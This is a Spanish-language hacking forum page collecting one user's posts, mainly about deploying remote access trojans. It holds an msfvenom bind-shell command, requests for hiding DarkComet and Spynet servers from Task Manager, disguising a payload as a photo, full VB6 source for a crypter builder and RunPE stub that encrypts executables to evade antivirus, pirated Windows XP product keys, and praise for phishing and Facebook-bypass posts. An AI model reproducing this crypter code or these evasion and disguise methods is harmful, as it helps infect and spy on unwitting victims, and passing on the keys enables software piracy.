Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - mcr_bkn

#1
HOla amigos del foro tengo unas dudas q espero puedan ayudarme, estoy tratando de hacer pruebas de penetracion con metasploit y
meterpreter pero obviamente algo estoy haciendo mal o algun concepto no lo manejo del todo. bueno comienzo, realizo las pruebas
en vmware maquina 1 Kali y maquina 2 win xp sp3 (sin nada instalado). la configuracion de kali es eth0 conexión NAT (para tener
acceso a intertet) y eth1 conexión host-only. Para win xp tengo conexión host-only, bueno al realizar Nmap genera lo siguiente:




Starting Nmap 6.40 ( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ) at 2013-10-28 05:03 CLST
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 05:03
Scanning No tienes permitido ver los links. Registrarse o Entrar a mi cuenta [1 port]
Completed ARP Ping Scan at 05:03, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:03
Completed Parallel DNS resolution of 1 host. at 05:03, 13.01s elapsed
Initiating SYN Stealth Scan at 05:03
Scanning No tienes permitido ver los links. Registrarse o Entrar a mi cuenta [1000 ports]
Discovered open port 139/tcp on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Discovered open port 3389/tcp on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Discovered open port 135/tcp on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Completed SYN Stealth Scan at 05:03, 1.22s elapsed (1000 total ports)
Initiating Service scan at 05:03
Scanning 3 services on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Completed Service scan at 05:03, 6.08s elapsed (3 services on 1 host)
NSE: Script scanning No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Host is up (0.00024s latency).
Scanned at 2013-10-28 05:03:20 CLST for 20s
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:XX:XX:XX (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at No tienes permitido ver los links. Registrarse o Entrar a mi cuenta .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
           Raw packets sent: 1068 (46.976KB) | Rcvd: 1001 (40.040KB)



en Nesus:



high
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remo...
Windows
1
medium
Microsoft Windows Remote Desktop Protocol Server Man-in-the-...
Windows
1
medium
Terminal Services Encryption Level is Medium or Low
Misc.
1
low
Terminal Services Encryption Level is not FIPS-140 Compliant...
Misc.
1



Ahora intente realizar un meterpreter según un tutorial realizado por Sanko, realice msfvenom con el payload shell_bind_tcp,
quedando algo asi:

msfvenom --payload windows/shell_bind_tcp LPORT=1337 C --encoder x86/shikata_ga_nai --iterations 6 --bad-chars '\x00'

con este shellcode genere un .exe y lo ejecute en la maquina de win xp, lo cual queda como en la imagen:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Si se fijan queda 0.0.0.0 1337, bueno el problema que cuando quiero llamar con handlen no conecta:



use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
set LPORT 1337
exploit


Bueno aca van las preguntas:

1.- Con los puertos abiertos que da Nmap y las vulnerabilidades de Nessus que payload puedo ocupar para generar una conexion meterpreter??

2.- Con el shell_bind_tcp LPORT=1337, LPORT es mi puerto abierto, osea el de la maquina virtual de Kali como puedo verificar q ese puerto esta abierto, lo tengo q abrir o como puedo abrir un puerto en una maquina virtual???

3.- En las maquinas virtuales tengo q tener abierto los puertos (ya sea RPORT y LPORT) para hacer pruebas de penetración??

4.- Como puedo hacer conexión meterpreter con la información entregada???


Bueno espero puedan ayudarme y gracias de ante mano... Saludos!!!
#2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Cualquiera de los 2 te servira para pruebas de pentest,
te dejo el link del XP SP3 : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

seriales:

JDRWX-463P6-FQRCH-GG44T-J4FVQ
J2CY6-TP66F-PM48K-9Y4TF-JTYBQ
JPWBM-J9KFF-YRPFD-QMJPR-22PCW
7QVT6-T2738-WRKJB-YKRFQ-XVK98
B77QF-DP27W-4H68R-72B48-78RPD
Saludos !


Gracias bro!!!! vamos a probar con este win xp sp3 a ver como me vas!!! saludos a todos!!!
#3
Amigos, tengo una consulta estoy comenzando con las pruebas de pentest y tengo una duda, para comenzar varios tutos recomiendan win xp sp2 pero sera recomendable empezar a la fecha con win xp sp3??? y si alguien tiene las ISO que pueda compartir para descargarlas, estas deben tener alguna configuraciòn en especial??
#4
Estimado amigos, quería hacer una consulta a ver si me pueden ayudar. Siempre he tenido problemas con los RAT (Spynet y Darkcomet) en el sentido cuando el remoto lo ejecuta 2 o 3 veces... tengo que ir a administrador de tareas y cerrar un server para que pueda entrar a windows, llegue a la conclusión (ratifiquen si estoy en lo cierto), que escribe en el mismo registro de windows la veces que se ejecuta y esto causa varios problemas (ver fotos adjuntas). A ver si me pueden ayudar a solucionar esto, tenia pensado en agregarle al crypter (realizado en vb6) un modulo que verifique si esta escrito en el registro no ejecute el server, googleando encontre esto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta publicado por karcrack, pero no logro hacerlo funcionar para lo que yo quiero... bueno eso... espero puedan ayudarme y de ante mano muchas gracias!!!



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Solo queria probar bt5, pero al Instalar los repos igual se instalan los programas de bt5?
#6
Hola amigos del foro, espero puedan ayudarme. Hce poco me compre un pc nuevo :D y a la sorpresa de querer instalarle otro SO (backtrack5) me encontre con la sorpresa que no se podia. Investigue y me encontre q los nuavos pc (con windows 8) tiene UEFI boot, googleando encontre que ubuntu 12.10 es compatible con UEFI, pero yo queria probar backtrack 5. No he encontrado nada concreto a ver si alguien que le haya pasado lo mismo pueda ayudarme.

Saludos!!!
#7
Off Topic / Re:De que pais eres?
Enero 17, 2013, 03:32:46 AM
Yo soy de Chile!!!! igual que mis compatriotas DLV, ELBARTOkpc y BCKTR1X viva chile y el hacking chileno jejeje!!! Saludos a todos...!!!
#8
Talleres Underc0de / Re:Taller de Python #1
Enero 08, 2013, 07:28:57 AM
Muy buena Antrax!!!! vamos a chequearlo se ve super interesante...!!! esta de lujo para adentrarse al lenguaje... Saludos!!
#9
mira el archivo final que te queda y que contiene el server te quedaria Foto Sexe.jpg

pero mas explicado esta en el video...

Saludos espero te sirva saludos...
#10
Estimados amigos, alomejor un tema un poco repetitivo pero le comparto un video que hice hace un tiempo (para principiantes) y lo queria compartir aca en underc0de!!! :) bueno este método tiene mi estampa pero sacando ideas de varios lados...  bueno acá esta el link...

Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pass: mcr_hack


Nota: Les aconsejo mejorar la configurar del Sfx Compiler ya que la q esta en el vídeo creara una carpeta en C: hay una opción para guardar los archivos en la carpeta Temp, no lo quise hacer de nuevo ya q me dio un poco de flojera jejejeje... Bueno es mi primer vídeo tutorial espero les sirva Saludos!!!
#11
Igualmente Antrax, muy feliz año para ti y a todos los del foro...
#12
Hacking / Re:Enviar mail anonimos y fakes
Diciembre 18, 2012, 11:19:39 AM
Gracias bro va a hacer de mucha ayuda... :)
#13
Hacking / Re:Fake hotmail (By Aryenal)
Diciembre 16, 2012, 10:15:56 AM
Gracias bro!!! saludos... haces muy buenos aportes....
#14
Hola amigo, esto funcionara para saltar la seguridad de facebook?
#15
Códigos Fuentes / Re:XOR encryption ASM
Diciembre 12, 2012, 12:08:52 AM
nadie sabe que pasa??
#16
Dudas y pedidos generales / Re:Problema con el Spynet2.6
Diciembre 10, 2012, 11:39:04 PM
eso es por el proceso que lo inyectas!!! cambia al proceso que inyectas al remoto!!!

P.D. no uses la apología infectar, va contra las reglas...!!
#17
Códigos Fuentes / Re:XOR encryption ASM
Diciembre 06, 2012, 03:59:20 PM
Bro gracias por la ayuda!! el runpe es de pink y los códigos son los siguientes:


stub:

Código: php
Dim Yopo As String, Clave As String, Jclas As New Class1, Archivo As String, dattos() As Byte



Sub Main()

Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
Yopo = Space(LOF(1))
Get #1, , Yopo
Close #1

Clave = Split(Yopo, "~<{symphonatik}>~")(1)
Archivo = Split(Yopo, "~<{symphonatik}>~")(2)

Archivo = Jclas.DecryptString(Archivo, Clave)

dattos() = StrConv(Archivo, vbFromUnicode)
Call RunPE(App.Path & "\" & App.EXEName & ".exe", dattos())

End Sub





Builder:

Código: php
Dim origenStub As String

Public Function sRndStr(sLen As Long) As String
'Autor: Slek
'Propósito: Generar una Str Aleatoria
'v.1 Indetectables.net
Dim lPos As Long, i As Long
Const Str As String = "$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz"

Randomize Timer
For i = 1 To sLen
lPos = Rnd * 14373 Mod Len(Str)

sRndStr = sRndStr & Mid(Str, lPos + 1, 1)
Next i
End Function
Private Sub CEncriptar_Click()
Dim Origen As String, Destino As String, Cifrado As String, hatsune() As Byte, miku As String, archivo As String, Jclas As New Class1

With CD
.DialogTitle = "Archivo a encriptar..."
.Filter = "todos los archivos|*.*"
.ShowOpen
End With
If CD.Filename <> vbNullString Then
Origen = CD.Filename
End If

With CD
.DialogTitle = "Donde guardaras el archivo..."
.Filter = "Archivo ejecutable|*.exe"
.ShowSave
End With
If CD.Filename <> vbNullString Then
Destino = CD.Filename
End If

Cifrado = sRndStr(49)


Open Origen For Binary As #1
archivo = Space(LOF(1))
Get #1, , archivo
Close #1

archivo = Jclas.EncryptString(archivo, Cifrado)


Open origenStub For Binary As #1
miku = Space(LOF(1))
Get #1, , miku
Close #1

Open Destino For Binary As #1
Put #1, , miku
Put #1, , "~<{symphonatik}>~"
Put #1, , Cifrado
Put #1, , "~<{symphonatik}>~"
Put #1, , archivo
Close #1

MsgBox "que lo disfrutes!!!"

End Sub

Public Sub CSelStub_Click()

With CD
.DialogTitle = "Selecciona el stub..."
.Filter = "ejecutables|*.exe"
.ShowOpen
End With
If CD.Filename <> vbNullString Then
origenStub = CD.Filename
End If

CEncriptar.Enabled = True
End Sub
#18
Códigos Fuentes / Re:XOR encryption ASM
Diciembre 05, 2012, 08:20:54 PM
Estuve chequeando esta encriptación y no la puedo echar a correr... a ver si me pueden ayudar... estoy haciendo un crypter en vb6, la función de encriptación es "ASMXORString" esta misma se usa en el stub??? para descriptar... me sale error 9... al encriptar una bolita... a ver si me pueden ayudar...
#19
Por si no me fije bien, pero Darkcomet no me da la opcion de inyectare en un proceso... y lo q dice sanko alguien que lo haga desde vb6???
#20
Estimados amigos, probando con darkcomet 5.3.1 desde mi pc escritorio, me di cuenta que en el administrador de tareas aparece el troyano (en aplicaciones y procesos) quiero saber si el RAT tiene una opcion para ocultarlo o si esto depende del crypter... a ver si me pueden ayudar..!!! Saludos...